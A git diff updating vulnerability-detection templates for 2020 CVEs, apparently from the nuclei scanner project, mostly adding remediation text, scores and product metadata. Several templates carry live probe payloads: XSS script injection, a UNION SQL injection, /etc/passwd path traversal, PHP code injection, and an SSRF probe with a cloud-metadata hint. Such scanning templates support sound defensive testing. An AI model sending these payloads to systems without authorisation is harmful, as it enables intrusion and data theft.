verified: true + max-request: 3 + vendor: rukovoditel + product: rukovoditel + tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + - | + POST /index.php?module=entities/&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true + +# digest: 4b0a00483046022100a0fe90a1f98c95f40932bc1b8b454b36dccd0b540aa3e9c3087c5dd80efbb45e022100de575c6d1ce89994f9bb14fc9a5ddb11b2243d5b8ad9b0a7e956e241c51db8bd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index ceb47e1d77..bfc998fe7d 100644 --- a/http/cves/2020/CVE-2020-36112.yaml +++ b/http/cves/2020/CVE-2020-36112.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successful exploitation of this vulnerability will lead to an attacker dumping the entire database. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49314 - https://www.tenable.com/cve/CVE-2020-36112 @@ -14,11 +16,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-36112 cwe-id: CWE-89 - cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:*:*:*:*:*:*:*:* - epss-score: 0.47622 - tags: cve,cve2020,sqli,cse,edb,tenable + epss-score: 0.4379 + epss-percentile: 0.96953 + cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cse_bookstore_project + product: cse_bookstore + tags: cve,cve2020,sqli,cse,edb,tenable http: - raw: @@ -34,4 +39,4 @@ http: - "Can't retrieve data You have an error in your SQL syntax" condition: or -# Enhanced by mp on 2022/04/28 +# digest: 490a004630440220243db3eb64081228fe89e208cef6d90bffa2faec2825f1fac333fbac14545f08022052697ecb1338c52050e222968cbd4b326e28ab8d13e7f21ee48b70180fef3589:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index 5858f8d672..4df3eeeae3 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1. + remediation: | + Apply the necessary patches or updates provided by Atlassian to fix the vulnerability. reference: - https://twitter.com/ptswarm/status/1402644004781633540 - https://jira.atlassian.com/browse/JRASERVER-71559 @@ -13,10 +15,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-36289 - cwe-id: CWE-200 - epss-score: 0.9733 + cwe-id: CWE-863 + epss-score: 0.92682 + epss-percentile: 0.98713 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: atlassian + product: data_center shodan-query: http.component:"Atlassian Jira" tags: cve,cve2020,jira,atlassian,unauth @@ -27,6 +33,7 @@ http: - '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin' stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -43,4 +50,4 @@ http: status: - 200 -# Enhanced by md on 2023/04/04 +# digest: 4a0a0047304502206a3416d4848aff767234778700b60545db1e37ed9ac23e3c2f99a65d39e4c808022100a1e2765dcb66c992b8f7b1fa042427766b081ccf70e454852bfbf3550b326aef:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index 0730393f79..12c53111c6 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Smartstore to version 4.1.0 or later to fix the open redirect vulnerability. reference: - https://github.com/smartstore/SmartStoreNET/issues/2113 - https://github.com/smartstore/SmartStoreNET @@ -14,16 +16,18 @@ info: cvss-score: 6.1 cve-id: CVE-2020-36365 cwe-id: CWE-601 - cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* epss-score: 0.00331 + epss-percentile: 0.67845 + cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: smartstore + product: smartstorenet shodan-query: http.html:'content="Smartstore' tags: cve,cve2020,redirect,smartstore http: - method: GET - path: - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' @@ -33,4 +37,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by md on 2022/10/14 +# digest: 4a0a0047304502200c65dab30d07362a76be8f51622dc3e23725432d0b023a09cc5bb0f1d9d0d352022100f0e58042ffde0b5cb1f5d181b5fe305a228fef75146fd46138cc668f992a3d36:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index f0caf2683e..9583130973 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action. + remediation: | + Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95 - https://nvd.nist.gov/vuln/detail/CVE-2020-36510 @@ -14,11 +16,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-36510 cwe-id: CWE-79 - cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:*:*:* - epss-score: 0.00119 + epss-score: 0.00106 + epss-percentile: 0.42912 + cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: "false" + max-request: 1 + vendor: codetipi + product: 15zine + framework: wordpress tags: xss,wordpress,wp-theme,wp,cve,cve2020,wpscan http: @@ -42,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/14 +# digest: 4a0a00473045022100ce09b4f988771e2dc96d84d97ee9ba4bc5c1ed05f62fe2a8719c134405a7f27a02202ba8c8fdc4174319774c16427646ec0ffd34d278c92e647051835c0b08c23516:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index bf359040ed..26628e1da7 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -9,6 +9,8 @@ info: XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. + remediation: | + Apply the latest security patches or updates provided by IBM to mitigate the vulnerability. reference: - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - https://github.com/Ibonok/CVE-2020-4463 @@ -20,10 +22,13 @@ info: cvss-score: 8.2 cve-id: CVE-2020-4463 cwe-id: CWE-611 - cpe: cpe:2.3:a:ibm:maximo_asset_management:*:*:*:*:*:*:*:* - epss-score: 0.74371 + epss-score: 0.45677 + epss-percentile: 0.97012 + cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: ibm + product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 tags: cve,cve2020,ibm,xxe,disclosure @@ -32,17 +37,18 @@ http: path: - "{{BaseURL}}/os/mxperson" - "{{BaseURL}}/meaweb/os/mxperson" + body: | + headers: - Content-Type: application/xml + Content-Type: "application/xml" matchers-condition: and matchers: - - type: word part: body words: @@ -54,4 +60,4 @@ http: words: - "application/xml" -# Enhanced by mp on 2022/06/28 +# digest: 4a0a00473045022039ec626129712facbf2a7cc00f42ca1768f22cda6ccdbad1a20057e26303f268022100dfcb75e8066846b412711663da9f734c9809294a811f6801f552ee7b86ab715a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index c63c9bf013..ae5675ca1e 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47841 - https://phpgurukul.com/hospital-management-system-in-php/ @@ -15,11 +17,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-5191 cwe-id: CWE-79 - cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:*:*:*:*:*:*:*:* - epss-score: 0.00311 + epss-score: 0.00345 + epss-percentile: 0.68464 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: phpgurukul + product: hospital_management_system_in_php tags: cve2020,hms,cms,xss,authenticated,edb,cve http: @@ -30,7 +35,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}}&submit=&submit= - - | POST /hospital/hms/admin/doctor-specilization.php HTTP/1.1 Host: {{Hostname}} @@ -38,9 +42,10 @@ http: doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3Ctd%3E&submit= + cookie-reuse: true host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -57,4 +62,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/02 +# digest: 490a00463044022016e5cad951230091b45f846dd9bebaea6e80787fc32ac4e5ecf50a5b51db8f8902203f1498d9edfa73017b34f802decf20a29d1652e9bfbd8b4e6b68cafa271f06ba:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5192.yaml b/http/cves/2020/CVE-2020-5192.yaml index aa44f8c74a..413f38a72d 100644 --- a/http/cves/2020/CVE-2020-5192.yaml +++ b/http/cves/2020/CVE-2020-5192.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in Hospital Management System 4.0. reference: - https://www.exploit-db.com/exploits/47840 - https://phpgurukul.com/hospital-management-system-in-php/ @@ -15,13 +17,15 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5192 cwe-id: CWE-89 - cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:*:*:*:*:*:*:*:* - epss-score: 0.00529 + epss-score: 0.31381 + epss-percentile: 0.96479 + cpe: cpe:2.3:a:phpgurukul:hospital_management_system_in_php:4.0:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 + vendor: phpgurukul + product: hospital_management_system_in_php tags: cve2020,hms,cms,sqli,authenticated,edb,cve - variables: num: "999999999" @@ -33,7 +37,6 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}password={{password}}&submit=&submit= - - | POST /hospital/hms/doctor/search.php HTTP/1.1 Host: {{Hostname}} @@ -41,9 +44,10 @@ http: searchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search= + cookie-reuse: true host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -55,4 +59,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 +# digest: 4a0a0047304502207e8eeef3c75fdcf391fab060edbf05c6d09d21007bc07dbe2194b85159a8f325022100e4125342a813a9382723396c5dbfe341bd6058e81dbf5536b4e45c0c14b02f04:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5284.yaml b/http/cves/2020/CVE-2020-5284.yaml index 813ef20435..bd55ad10f0 100644 --- a/http/cves/2020/CVE-2020-5284.yaml +++ b/http/cves/2020/CVE-2020-5284.yaml @@ -5,38 +5,44 @@ info: author: rootxharsh,iamnoooob,dwisiswant0 severity: medium description: Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. + remediation: This issue is fixed in version 9.3.2. reference: - https://github.com/zeit/next.js/releases/tag/v9.3.2 - https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj - https://nvd.nist.gov/vuln/detail/CVE-2020-5284 - remediation: This issue is fixed in version 9.3.2. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N cvss-score: 4.3 cve-id: CVE-2020-5284 - cwe-id: CWE-22 + cwe-id: CWE-22,CWE-23 + epss-score: 0.00152 + epss-percentile: 0.51256 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* - epss-score: 0.00122 - tags: cve,cve2020,nextjs,lfi metadata: max-request: 1 + vendor: zeit + product: next.js + tags: cve,cve2020,nextjs,lfi http: - method: GET path: - "{{BaseURL}}/_next/static/../server/pages-manifest.json" + matchers-condition: and matchers: - - type: regex - regex: - - '\{"/_app":".*?_app\.js"' - part: body - type: word + part: header words: - "application/json" - part: header + + - type: regex + part: body + regex: + - '\{"/_app":".*?_app\.js"' + - type: status status: - 200 -# Enhanced by mp on 2022/07/22 +# digest: 4a0a0047304502205de3809e5cb555765ae5104ae0658548cead6297f3c106b6077a3fc8a158f8f3022100d6f6b6e497fae846dba0b3a2d5a99b0d817ac0060f33034005b3d5e9c0c08afc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5307.yaml b/http/cves/2020/CVE-2020-5307.yaml index 4f9094f5c8..d6b7f52aa5 100644 --- a/http/cves/2020/CVE-2020-5307.yaml +++ b/http/cves/2020/CVE-2020-5307.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. + remediation: | + Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the PHPGurukul Dairy Farm Shop Management System 1.0. reference: - https://cinzinga.com/CVE-2020-5307-5308/ - https://nvd.nist.gov/vuln/detail/CVE-2020-5307 @@ -15,11 +17,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5307 cwe-id: CWE-89 - cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:*:*:*:*:*:*:*:* - epss-score: 0.01029 - tags: sqli,edb,cve,cve2020 + epss-score: 0.02037 + epss-percentile: 0.87713 + cpe: cpe:2.3:a:phpgurukul_dairy_farm_shop_management_system_project:phpgurukul_dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phpgurukul_dairy_farm_shop_management_system_project + product: phpgurukul_dairy_farm_shop_management_system + tags: sqli,edb,cve,cve2020 http: - raw: @@ -41,4 +46,4 @@ http: status: - 302 -# Enhanced by mp on 2022/04/28 +# digest: 4a0a0047304502210089ebe5a4e647cf37627b63d6efb6357fc9adee2d511f688939e98385a09621a30220341a20d0a5290dc4af266964c4bd6e1e124b2540ed574c5127b997a36d80f378:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5405.yaml b/http/cves/2020/CVE-2020-5405.yaml index c5398e9a7b..0b803a6627 100644 --- a/http/cves/2020/CVE-2020-5405.yaml +++ b/http/cves/2020/CVE-2020-5405.yaml @@ -5,6 +5,8 @@ info: author: harshbothra_ severity: medium description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. + remediation: | + Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability. reference: - https://pivotal.io/security/cve-2020-5405 - https://nvd.nist.gov/vuln/detail/CVE-2020-5405 @@ -12,25 +14,30 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-5405 - cwe-id: CWE-22 - cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* + cwe-id: CWE-22,CWE-23 epss-score: 0.00258 - tags: cve,cve2020,lfi,springcloud + epss-percentile: 0.63319 + cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: vmware + product: spring_cloud_config + tags: cve,cve2020,lfi,springcloud http: - method: GET path: - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' + matchers-condition: and matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status status: - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body -# Enhanced by mp on 2022/07/22 +# digest: 4a0a00473045022002ed8e8e07642c45ae46aaf0a2584fe9cb7af3386c319acf90b4e20a3c753a10022100caccd25af83021aeeeecb71c0ae3cd3ca5c4afdeeb3b73a9c1244f0b084a9c14:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5410.yaml b/http/cves/2020/CVE-2020-5410.yaml index 516b74adf1..a5a5633f94 100644 --- a/http/cves/2020/CVE-2020-5410.yaml +++ b/http/cves/2020/CVE-2020-5410.yaml @@ -5,6 +5,8 @@ info: author: mavericknerd severity: high description: Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack. + remediation: | + Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches. reference: - https://tanzu.vmware.com/security/cve-2020-5410 - https://nvd.nist.gov/vuln/detail/CVE-2020-5410 @@ -12,12 +14,15 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-5410 - cwe-id: CWE-22 + cwe-id: CWE-22,CWE-23 + epss-score: 0.96802 + epss-percentile: 0.99563 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* - epss-score: 0.9712 - tags: cve,cve2020,lfi,springcloud,config,traversal,kev metadata: max-request: 1 + vendor: vmware + product: spring_cloud_config + tags: cve,cve2020,lfi,springcloud,config,traversal,kev http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: @@ -36,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/28 +# digest: 4a0a00473045022100ed7db5a579f50ebb3fcb5385ef724ff31e0ebb5c636e7c5f66d85eb39ed0aa560220170b9af8fa7e108ed737982a8a96aed4724d773ec657e190274e163df6b25bf1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5412.yaml b/http/cves/2020/CVE-2020-5412.yaml index 6a8493622f..2da821e28b 100644 --- a/http/cves/2020/CVE-2020-5412.yaml +++ b/http/cves/2020/CVE-2020-5412.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Spring Cloud Netflix 2.2.x prior to 2.2.4, 2.1.x prior to 2.1.6, and older unsupported versions are susceptible to server-side request forgery. Applications can use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. An attacker can send a request to other servers and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or updates provided by Spring Cloud Netflix to mitigate the vulnerability. reference: - https://tanzu.vmware.com/security/cve-2020-5412 - https://nvd.nist.gov/vuln/detail/CVE-2020-5412 @@ -12,20 +14,21 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2020-5412 - cwe-id: CWE-610 + cwe-id: CWE-441,CWE-610 + epss-score: 0.39161 + epss-percentile: 0.96832 cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* - epss-score: 0.03435 - tags: cve,cve2020,ssrf,springcloud metadata: max-request: 1 + vendor: vmware + product: spring_cloud_netflix + tags: cve,cve2020,ssrf,springcloud http: - method: GET path: - "{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}" - # To get crithit, try http://169.254.169.254/latest/metadata/ - matchers-condition: and matchers: - type: word @@ -42,4 +45,5 @@ http: status: - 200 -# Enhanced by md on 2023/04/04 +# To get crithit, try http://169.254.169.254/latest/metadata/ +# digest: 4a0a00473045022100ed1f801ab61e0c61fd5c6a2db8f6764d00656039aad7f238548715133702a4ef022037982bfc194b65d911b1a8d435f83d6c39ab211642f7b3224fde3f3a7c4178b9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5775.yaml b/http/cves/2020/CVE-2020-5775.yaml index f0a71307b4..22f2598e35 100644 --- a/http/cves/2020/CVE-2020-5775.yaml +++ b/http/cves/2020/CVE-2020-5775.yaml @@ -5,6 +5,8 @@ info: author: alph4byt3 severity: medium description: Canvas version 2020-07-29 is susceptible to blind server-side request forgery. An attacker can cause Canvas to perform HTTP GET requests to arbitrary domains and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches provided by Canvas LMS to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2020-49 - https://nvd.nist.gov/vuln/detail/CVE-2020-5775 @@ -13,11 +15,14 @@ info: cvss-score: 5.8 cve-id: CVE-2020-5775 cwe-id: CWE-918 - cpe: cpe:2.3:a:instructure:canvas_learning_management_service:*:*:*:*:*:*:*:* - epss-score: 0.00166 - tags: cve,cve2020,ssrf,oast,blind,tenable + epss-score: 0.00194 + epss-percentile: 0.56967 + cpe: cpe:2.3:a:instructure:canvas_learning_management_service:2020-07-29:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: instructure + product: canvas_learning_management_service + tags: cve,cve2020,ssrf,oast,blind,tenable http: - method: GET @@ -30,4 +35,4 @@ http: words: - "http" -# Enhanced by md on 2023/04/04 +# digest: 4b0a00483046022100986d03b2bd89c3f9429e4f8da94bb4f3e543ad8fb9be5fec7caf2b62b8a222a5022100a4d4682d8b054e88fe15e5f6ee8445fa4dc7e1249772723be1b214af3092bcef:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5776.yaml b/http/cves/2020/CVE-2020-5776.yaml index a2923c0e5a..189dab687b 100644 --- a/http/cves/2020/CVE-2020-5776.yaml +++ b/http/cves/2020/CVE-2020-5776.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: high description: MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session. + remediation: | + Implement CSRF protection mechanisms such as anti-CSRF tokens and referer validation. reference: - https://www.tenable.com/security/research/tra-2020-51 - https://nvd.nist.gov/vuln/detail/CVE-2020-5776 @@ -13,10 +15,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-5776 cwe-id: CWE-352 + epss-score: 0.56617 + epss-percentile: 0.97313 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* - epss-score: 0.53263 metadata: max-request: 3 + vendor: magmi_project + product: magmi shodan-query: http.component:"Magento" tags: magmi,magento,tenable,cve,cve2020 @@ -40,6 +45,7 @@ http: GET /magmi/web/info.php HTTP/1.1 Host: {{Hostname}} Connection: close + matchers-condition: and matchers: - type: word @@ -47,8 +53,9 @@ http: - "PHP Extension" - "PHP Version" condition: and + - type: status status: - 200 -# Enhanced by mp on 2022/06/28 +# digest: 4a0a0047304502203a98e2f5ab74511df536fbd4b4c654983affc259c3406cef2ed622ba688e4c52022100f7670abed38369ac74003fbe42102b7fef0f226a966976af88d62985b135ecd9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5777.yaml b/http/cves/2020/CVE-2020-5777.yaml index 9a29b19c32..812367307d 100644 --- a/http/cves/2020/CVE-2020-5777.yaml +++ b/http/cves/2020/CVE-2020-5777.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Magento Mass Importer (aka MAGMI) versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure. + remediation: | + Upgrade to version 0.7.24 or later to fix the authentication bypass vulnerability. reference: - https://github.com/dweeves/magmi-git/blob/18bd9ec905c90bfc9eaed0c2bf2d3525002e33b9/magmi/inc/magmi_auth.php#L35 - https://nvd.nist.gov/vuln/detail/CVE-2020-5777 @@ -14,10 +16,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5777 cwe-id: CWE-287 + epss-score: 0.02889 + epss-percentile: 0.89633 cpe: cpe:2.3:a:magmi_project:magmi:*:*:*:*:*:*:*:* - epss-score: 0.01568 metadata: max-request: 1 + vendor: magmi_project + product: magmi shodan-query: http.component:"Magento" tags: plugin,tenable,cve,cve2020,magmi,magento,auth,bypass @@ -31,11 +36,12 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "Too many connections" - part: body + - type: status status: - 503 -# Enhanced by mp on 2022/04/28 +# digest: 4a0a0047304502204c268e379f1df51d47f9a4a8d44f92be8b663d3ea6d930edd248361cdbfcb666022100e225857fde02fc831c8baee7e11ae5e00aa5de82a74c1d3e81696bd1b8c679fb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5847.yaml b/http/cves/2020/CVE-2020-5847.yaml index 536383fdbb..92c01c2ed3 100644 --- a/http/cves/2020/CVE-2020-5847.yaml +++ b/http/cves/2020/CVE-2020-5847.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: critical description: UnRaid <=6.80 allows remote unauthenticated attackers to execute arbitrary code. + remediation: | + Upgrade UnRaid to a version higher than 6.80 to mitigate the vulnerability. reference: - https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5847 @@ -15,23 +17,28 @@ info: cvss-score: 9.8 cve-id: CVE-2020-5847 cwe-id: CWE-94,CWE-668 + epss-score: 0.97002 + epss-percentile: 0.99651 cpe: cpe:2.3:a:unraid:unraid:*:*:*:*:*:*:*:* - epss-score: 0.97272 metadata: max-request: 1 + vendor: unraid + product: unraid tags: cve,cve2020,rce,kev http: - method: GET path: - "{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word words: - "b13928fbcfff659363d7c7d1ec008d56" -# Enhanced by mp on 2022/04/28 + - type: status + status: + - 200 + +# digest: 4a0a00473045022100bc0c8c8617655d2dec2fee67f6012bb56cedd908f792a82d1af51dde0c5404b4022058f4d8194f12298184c7378dd369679c53da2e9595cca6a7b817705dd7988979:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2020/CVE-2020-5902.yaml b/http/cves/2020/CVE-2020-5902.yaml index c0507f572f..d7112ce363 100644 --- a/http/cves/2020/CVE-2020-5902.yaml +++ b/http/cves/2020/CVE-2020-5902.yaml @@ -5,6 +5,8 @@ info: author: madrobot,dwisiswant0,ringo severity: critical description: F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages. + 